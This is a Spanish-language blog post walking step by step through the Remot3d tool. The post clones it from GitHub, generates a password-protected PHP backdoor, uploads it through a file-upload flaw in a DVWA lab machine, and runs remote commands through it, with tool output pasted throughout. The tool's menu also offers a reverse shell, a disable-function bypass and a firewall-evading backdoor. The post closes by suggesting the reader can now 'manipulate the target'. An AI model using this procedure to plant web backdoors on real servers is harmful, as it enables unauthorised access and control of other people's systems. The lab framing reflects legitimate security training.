martes, 9 de abril de 2019

Construya su propio backdoor


Un backdoor es un malware que se utiliza para interrumpir la autenticación de cualquier sistema informático. Hoy en día, la mayoría de los ataques de backdoor están aumentando en las organizaciones. Un backdoor toma forma oculta en el programa y se puede diseñar y programar fácilmente, como se demostró en el curso de ethical hacking del Instituto Internacional de Seguridad Cibernética. Hoy le mostraremos un programa simple que se utiliza para crear backdoors fácilmente.
La herramienta Remot3d se utiliza en la creación de backdoors. Se trata de unas pocas líneas de código que se utilizan para atacar aplicaciones web php.
Atacante:
  • En el lado del atacante estamos utilizando DVWA para probar la herramienta. Para descargar DVWA iso vaya a: https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/
  • Después de descargar iso, abra iso en virtual box o vmware workstation. Entonces empieza iso
  • Para obtener DVWA escriba ip ifconfig. En nuestro caso, IP fue 192.168.1.105
Instalación:
  • Esta herramienta ha sido probada en Parrot OS 4.5
  • Para la clonación, escriba git clone https://github.com/KeepWannabe/Remot3d.git
  • Escriba cd Remot3d
  • Escriba ./Remot3d


          @@@@@@@   @@@@@@@@  @@@@@@@@@@    @@@@@@   @@@@@@@  @@@@@@   @@@@@@@
          @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@  @@@@@@@  @@@@@@@@
          @@!  @@@  @@!       @@! @@! @@!  @@!  @@@    @@!        @@@  @@!  @@@
          !@!  @!@  !@!       !@! !@! !@!  !@!  @!@    !@!        @!@  !@!  @!@
          @!@!!@!   @!!!:!    @!! !!@ @!@  @!@  !@!    @!!    @!@!!@   @!@  !@!
          !!@!@!    !!!!!:    !@!   ! !@!  !@!  !!!    !!!    !!@!@!   !@!  !!!
          !!: :!!   !!:       !!:     !!:  !!:  !!!    !!:        !!:  !!:  !!!
          :!:  !:!  :!:       :!:     :!:  :!:  !:!    :!:        :!:  :!:  !:!
          ::   :::   :: ::::  :::     ::   ::::: ::     ::    :: ::::   :::: ::
          :   : :  : :: ::    :      :     : :  :      :      : : :   :: :  :
                        --------------------------------------
                           PHP REMOTE BACKDOOR - BY B1P0L4R

  [+] Options :   
 └[-] 1. Generate Backdoor   
 └[-] 2. Generate Reverser Shell (with iMap Disable Function Bypass)    
 └[-] 3. Bypass Read /etc/passwd (with unique logic)  
 └[-] 4. Remote your Backdoor (Just for Option 1)   
 ┌[+] Choose the options  
 └[root@indoxploit]:#
  • Arriba están las opciones que se usan para crear backdoors
  • Escriba 1

  ┌[+] Choose the options   └[root@indoxploit]:~# 1

       __----_
     /##|       \
    /###|     |  \______
   |####|               \
   |####|      ___   ___|©
   \####/     _____ /
     \###    /
     =====ÊšçØ      ╔═╗┬ ┬┌─┐  ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐      //
     /        \     ╠═╝├─┤├─┘  ╠╦╝├┤ ││││ │ │ ├┤      //
    |   |_      \   ╩  ┴ ┴┴    ╩╚═└─┘┴ ┴└─┘ ┴ └─┘    //  But it's useless !
    \___/      |    ╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗        //      you can't control his heart
     \         /    ╠╩╗╠═╣║  ╠╩╗ ║║║ ║║ ║╠╦╝       //
      |    |__|__   ╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═      //
      (______)___)  Version 2.0 - Stable

[+] Set Your Backdoor Name : backdoor.pbp
  • Luego escriba el nombre del backdoor: backdoor.php
  • Luego ingrese la contraseña: 123456

[+] Set Your Backdoor Password : 123456 
 └[-] Success Generating Backdoor on              /home/user/Downloads/Remot3d/backdoor.pbp
  • El backdoor se guardará en el directorio actual de Remot3d
  • Ahora es necesario que este backdoor.php se cargue en un servidor vulnerable, que en nuestro caso es DVWA. Usaremos la vulnerabilidad de carga en DVWA para cargar este backdoor.php
  • Para probar subir puerta trasera en DVWA. Ir al navegador y abrir dvwa. Escriba 192.168.1.105. Introduzca el nombre de usuario: admin y contraseña: password
  • Después de abrir DVWA, haga clic en Upload. Luego vaya a la ubicación de Remot3d y seleccione el archivo backdoor.php

  • Después de subir el archivo, vaya al terminal y teclee ./Remot3d
  • Escriba 4

[+] Options :    
 └[•] 1. Generate Remote Backdoor    
 └[•] 2. Generate Reverser Shell (with iMap Disable Function Bypass)    
 └[•] 3. Bypass Server Firewall (with FUD Backdoor Script)    
 └[•] 4. Remote your Backdoor (Just for Option 1)   

 ┌[+] Choose the options  
 └[root@indoxploit]:~# 4
  • Escriba la ubicación donde ha cargado Remot3d. Escriba http://192.168.1.105/hackable/uploads/backdoor.php
  • Escriba la misma contraseña que ha escrito al crear la puerta trasera
  • Escriba 123456

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++     ]
   [!] Backdoor Alive… Processing for Connect
   [+] Your Public IP : 47.5.27.25
   [+] System Info : 

 Notice:  Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

 Linux dvwa #41-Ubuntu SMP Thu Aug 19 01:12:52 UTC 2010 i686 unknown GNU/Linux
   [+] User ID : 

 Notice:  Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
  • Teclear ifconfig

[+] COMMAND : ifconfig
 
 Notice:  Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

 eth0      Link encap:Ethernet  HWaddr 00:0c:29:33:5d:c2
           inet addr:192.168.1.105  Bcast:192.168.1.255  Mask:255.255.255.0
           inet6 addr: fe80::20c:29ff:fe33:5dc2/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:1035 errors:0 dropped:0 overruns:0 frame:0
           TX packets:383 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000
           RX bytes:106710 (106.7 KB)  TX bytes:267977 (267.9 KB)
 lo        Link encap:Local Loopback
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:68 errors:0 dropped:0 overruns:0 frame:0
           TX packets:68 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0
           RX bytes:5440 (5.4 KB)  TX bytes:5440 (5.4 KB)
  • Escriba ls y mostrará los archivos actuales en el servidor

[+] COMMAND : ls
 
 Notice:  Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

 backdoor
 backdoor2
 backdoor3.php
 backdoor4.php
 dvwa_email.png
 test
  • Ahora puede manipular  su objetivo, si el objetivo está por encima de la vulnerabilidad.

Fuente: https://noticiasseguridad.com/
No olvides Compartir...
Siguenos en twitter: @disoftin

No hay comentarios:

Publicar un comentario